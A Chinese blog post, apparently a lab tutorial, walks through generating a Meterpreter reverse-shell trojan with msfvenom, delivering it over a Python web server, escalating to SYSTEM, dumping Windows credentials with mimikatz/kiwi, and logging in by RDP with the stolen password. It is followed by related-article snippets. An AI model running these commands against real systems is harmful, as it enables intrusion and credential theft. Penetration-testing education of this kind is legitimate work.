kali工具集-mimikatz提取内存凭据

已于 2025-05-21 15:29:50 修改
阅读量835 收藏 6
点赞数 27
分类专栏: kali工具集 文章标签: 网络安全 linux hash
于 2025-05-21 15:08:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46487664/article/details/148116819
版权

实验简介

本实验模拟真实网络攻击场景,通过Metasploit框架生成恶意程序(木马),利用Python搭建临时Web服务实现载荷投递,并结合Meterpreter会话进行权限提升与mimikatz提取凭证,最终通过远程桌面协议(RDP)验证系统控制权。

技能增长

通过本次实验的学习,能够掌握msfvenom生成Windows反向TCP载荷(木马程序)的操作,包括参数配置(LHOST/LPORT)与格式选择,并且掌握mimikatz内存凭证窃取技术

预备知识

metasploit框架的作用

Metasploit框架是一个强大的渗透测试平台,主要用于识别、验证和管理安全漏洞。它允许用户执行漏洞扫描、利用已知漏洞进行攻击、生成并部署payload以获取对目标系统的访问权限,并支持后续的渗透操作如权限提升和数据提取。此外,Metasploit还能帮助生成详细的测试报告,用于记录发现的安全问题及其解决方案。这个框架集成了大量的exploit和工具,非常适合安全专家用来进行全面的安全评估,但应确保在合法授权的情况下使用。

Mimikatz的工作原理

Mimikatz 主要通过直接与 Windows 操作系统的核心组件交互来获取敏感信息。其工作流程可以概括为以下几个步骤:

访问 LSASS 进程:Mimikatz 首先需要访问 Local Security Authority Subsystem Service (LSASS) 进程的内存空间。LSASS 负责执行本地安全策略,如用户身份验证和权限管理,并存储了各种认证信息。

读取内存中的凭证数据:一旦获得了对 LSASS 进程的访问权限,Mimikatz 就能够读取其中包含的凭证数据。这些数据包括但不限于登录用户的明文密码(如果启用了 WDigest 或者在较新版本的 Windows 中未禁用相应的安全功能)、NTLM 哈希值以及其他形式的身份验证凭据。

处理并展示结果:读取到的数据会被 Mimikatz 解析并格式化成可读的形式展示给用户。这使得攻击者或渗透测试人员能够直接查看或利用这些信息进行进一步的操作,比如横向移动或者提权。

其他功能:除了从内存中提取密码之外,Mimikatz 还具备多种其他功能,例如导出证书、操作 Kerberos 票据、创建管理员账户等。

实验环境

主机名:kali 用户名/密码:root/随机

IP地址:192.168.0.3

主机名:Windows7

用户名/密码:administrator/随机

IP地址:192.168.0.4

实验操作

进入kali虚拟机,执行msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=4444 -f exe >/muma.exe命令在根目录下生成恶意上线程序muma.exe,回连地址为192.168.0.3,监听端口为4444

执行python3 -m http.server 80 -d /命令利用python3工具启用临时web站点,站点目录为根目录

然后新建一个命令终端,执行msfconsole命令启动渗透测试工具

执行use exploit/multi/handler选择监听模块,然后执行 set payload windows/meterpreter/reverse_tcp命令选择反向连接载荷,执行set lhost 192.168.0.3设置回连地址为192.168.0.3,监听端口为4444。(注意:这里的回连地址和端口必须和恶意上线程序保持一致),最后执行run命令等待回连。

切换到Windows7虚拟机,打开IE浏览器,访问http://192.168.0.3/muma.exe,弹出文件下载-安全警告弹框,点击运行该程序(注意:这里是为了演示效果,才点击无签名证书的软件,平时遇到一律pass)

确保程序运行后,回到kali虚拟机,发现windows7成功上线

然后在meterpreter中,执行getuid命令查看当前用户权限,发现为administrator,权限不够,mimikatz提取内存中密码必须要system权限,这里执行getsystem命令自动提权至system。

执行load kiwi命令加载mimikatz模块,然后执行help kiwi查看支持的命令

然后执行creds_all命令提取所有用户的明文密码、哈希及票据,发现administrator的密码为vDTDfSbV0O(注意:windows获取密码方式为cloud,每次虚拟机部署成功后密码不一致)

当然还有一种方式获取登录票据的方式,执行mimikatz原生命令。执行kiwi_cmd "privilege::debug"命令启用调试权限,然后执行kiwi_cmd "sekurlsa::logonpasswords"提取登录凭证

新建一个命令终端,执行rdesktop 192.168.0.3命令rdp远程连接192.168.0.4,输入yes选择信任该证书

然后点击其他用户,输入用户名administrator,密码vDTDfSbV0O,成功连接windwos7虚拟机

特别声明:

此文章仅供参考,如用作非法交易造成一定损失或触犯法律,作者一概不负!!!!! 请勿用于非法途径,仅供参考。传送门 -----------> 《中华人民共和国网络安全法》

3.7-Mimikatz介绍和离线读取SAM文件抓取密码
qq_38122566的博客
03-12 1200
Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具,mimikatz可以从内存提取明文密码、哈希、PIN 码和 kerberos 票证。mimikatz 还可以执行哈希传递、票证传递或构建黄金票证。顶目地址:https://github.com/gentilkiwi/mimikatz/模块命令如下:cls: 清屏。
Mimikatz获取系统密码攻防研究
weixin_44023460的博客
06-23 4877
Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具,从早期1.0版本到现在的2.1.1 20180205版本,其功能得到了很大的提升和扩展。Mimikatz最新版本一共三个文件(mimilib.dll、mimikatz.exe、mimidrv.sys),分为Win32位(多了一个mimilove.exe文件)和X64位。通过它们可以提升进程权限、注
Kali实战-提权
小水池
05-28 4732
本地提权 windows默认账号 user Administrator System #最高权限 关系图示: Linux默认账号 User Root ADMIN提权为SYSTEM 思路:利用windows中以system运行的程序进行操作,将系统提权 win xp、win2003 at 18:12(时间) /interactive cmd ...
Mimikatz后渗透利用
白帽子佳奇的博客
05-29 1254
Mimikatz 的主要原理是在 Windows 系统中用户登录后系统会将身份凭证存储于lsass.exe进程的内存当中,Mimikatz 通过注入lsass.exe进程读取进程内存,从中获取对应的明文密码。
密码提取神器 mimikatz 现已支持Windows 10 RS2
weixin_34077371的博客
09-19 4518
本文讲的是密码提取神器 mimikatz 现已支持Windows 10 RS2,昨天稍早,安全研究者@gentilkiwi 在推特上宣布,知名密码提取工具mimikatz推出v2.1.1新版,正式支持Windows 10 RS2(1707)。 mimikatz是由C语言编写的开源小工具,于2014年4月发起。它的功能非常强大,支持从Windows系统...
kali渗透姿式小汇总
Amire0x的小乐园
11-09 2793
一些常用的信息收集方法,工具可以在kali里面找
CTF刷题笔记 - misc方向 - 电子取证/内存分析
m0_62652276的博客
12-31 3387
DPAPI技术是Windows提供的一种数据保护API,它本质上使用了Windows通过用户自己登录(sids,登录密码等),以及域登录后的一些数据生成的密钥,并且使用内置的算法,对用户指定的数据进行加密。对采用DPAPI技术加密的数据进行解密,需要获取当前操作系统登录用户对应的 Master Key,而获取 MasterKey 需要知道用户名、密码以及对应的SID,然后利用这些数据生成一个 blob 加密过程中使用的 MasterKey,从而对目标blob进行解密。
138-横向移动 Win&Linux&内存离线读取&Hashcat破解&RDP&SSH存储提取
DamnVanish的博客
08-24 1082
Windows&Linux读取密码的多种姿势
域渗透-Kerberoast 攻击利用详解
总有人间一两风,填我十万八千梦
03-28 3081
Kerberoast 攻击是域内渗透中经常使用的一种技术,主要通过利用 Kerberos 协议的特定阶段和加密算法的弱点,尝试破解域内服务的密码。利用前提:获取了一个普通域用户凭据。SPN(Service Principal Name,服务主体名称)是服务的唯一标识符。每个需使用Kerberos来进行身份验证的服务都需要一个SPN。SPN的存在有助于确保在Kerberos身份验证中能够正确地识别和授权服务。
kali里面怎么安装mimikatz
03-20
sekurlsa::logonpasswords # 提取凭据 ``` --- ### **常见问题解决** 1. **依赖缺失** 运行以下命令修复依赖: ```bash sudo apt --fix-broken install ``` 2. **32位兼容问题** 确保已执行 `sudo dpkg --...
kali mimikatz如何使用
04-11
Kali LinuxMimikatz是一个渗透测试工具,可用于提取Windows操作系统上的凭据。您可以将其下载并在Kali Linux命令行界面中使用。它具有各种功能,例如在本地和远程计算机上提取凭据的能力,以及执行LSA Secret、...
mimipenguin:Linux环境下提取当前用户登录密码工具解析
- 特定版本的GNOME Keyring存在漏洞(3.27.2之前),这些漏洞被“mimipenguin”利用来从系统内存提取凭据。 5. **细节说明**: - 工具的工作原理包括转储进程,以及从内存提取可能包含明文密码的数据行。 - ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8704
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Linux rpmsg源码分析
小伟的博客
05-18 748
RPMsg是利用通道进行数据通信,先用 /dev/rpmsg_ctrl0 设备通过ioctrl生成端点,然后使用生成的端点进行通讯名称服务,VIRTIO_RPMSG_F_NS 宏,不开启就不使用名称服务,使用就需要m核心先发送信息才可以注册设备m核心LinuxRPMsg内核驱动框架涉及到RPMsg框架、virtio框架、remoteproc子系统和mailbox子系统mailbox,驱动开发者可自我注册client生成设备提供APP层直接进行核间通信分析物理层,创建virtio dev。
Linux】借助gcc源码修改,搜索头文件当前进展
最新发布
05-22 167
在使用修改源代码编译的GCC,进行编译内核源代码时,好像性能要慢不少,有可能是打印日志操作有文件IO导致,也有可能是gcc编译的会不会不是release版本不太对,不太清楚。从上图可以看出对于每次的搜索,都是从第一个目录开始搜索,图里也可以看到修改源代码所在的目录,函数,行,昨天的博客感觉对于找到的位置还是不太好。其实,linux内核在编译时和链接时所使用的源代码不一定相同,也即编译能通过,但是链接会报缺少文件这类问题,下一步想找找链接时对于源文件搜索。这里也有一些gcc系统头文件目录搜索。
Linux】简易版Shell实现(附源码)
2301_80955819的博客
05-18 1823
本文介绍了如何基于Linux进程控制接口实现一个简易的Shell。首先分析了Bash的工作流程,包括打印命令行提示符、获取用户输入、解析命令行、执行命令等步骤。接着,通过代码实现了命令行提示符的打印、用户输入的获取以及命令行的解析。具体实现中,使用getenv函数获取环境变量中的用户名、主机名和路径,并通过fgets读取用户输入的命令行,最后使用strtok函数对命令行进行分割,提取出命令和参数。该简易Shell虽然功能简单,但有助于深入理解Shell的工作原理。
Linux 搭建FTP服务器(vsftpd)
Stringzhua的博客
05-22 987
或者修改/etc/selinux/config文件,将SELINUX=enconfig改为SELINUX=disabled,然后重启系统。在Linux上查看,发现已经有了scptoserver.txt文件,说明文件复制到服务器成功!默认即可,如果有需要可以修改/etc/ssh/sshd_config文件。scp 本地文件 user@远程服务器IP:/远程目录/在win10使用git的bash窗口上传文件到Linux。scp root@远程服务器ip:/远程文件 本地目录/
Linux(2)——shell原理及Linux中的权限
2301_80065652的博客
05-18 733
该提示是说你没有被超级用户(root)添加到信用列表(sudoers)当中,所以该条指令的权限得不到提升(你可以想想嘛,怎么可能让一个普通用户随意更改另一个普通用户的密码),只有当你被超级用户添加到信任列表后,你才拥有提升当前指令权限的能力。但实际上你会发现,你所创建出来的文件和目录的权限值往往不是我们所翻译出来的值,原因就是创建文件和目录的时候还要受到umask的影响,假设默认权限是mask,则实际创建出来的文件权限是:mask&(~umask)(2)将核心处理的结果返回给给用户。
Linux开放访问端口
qq_45855355的博客
05-18 483
客户端访问在Linux中挂起的服务器时浏览器页面总是提示超时,检查后发现是服务器的端口没开放,被防火墙挡住了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值